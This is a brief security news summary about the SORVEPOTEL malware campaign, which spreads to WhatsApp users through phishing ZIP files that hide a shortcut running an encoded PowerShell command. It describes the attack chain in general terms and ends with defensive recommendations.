Fast-Spreading Malware SORVEPOTEL Targets WhatsApp Users via Phishing Campaigns

A new malware campaign targeting WhatsApp users has been detected in September 2025. The malware, identified as SORVEPOTEL, is a self-propagating threat that spreads through phishing messages containing malicious ZIP files disguised as receipts or budgets. Upon opening the ZIP file, a hidden Windows shortcut executes an encoded PowerShell command, which downloads additional payloads, establishes persistence, and connects to attacker-controlled servers. The malware then takes control of active WhatsApp sessions and replicates itself to all contacts and groups, leading to rapid propagation. This campaign highlights the continued threat of phishing attacks and the use of legitimate tools like PowerShell for malicious purposes. The sophistication of the attack, including the use of encoded commands and hidden shortcuts, underscores the need for robust endpoint protection and user education. Organizations should ensure their email and messaging systems have robust filtering capabilities to detect and block malicious attachments. Additionally, advanced endpoint protection solutions that can detect and block malicious PowerShell scripts are essential. Users should be educated about the dangers of opening unexpected attachments, even from seemingly trusted sources. The rapid spread potential of this malware through WhatsApp contacts and groups emphasizes the importance of having a robust incident response plan to quickly contain and mitigate such threats.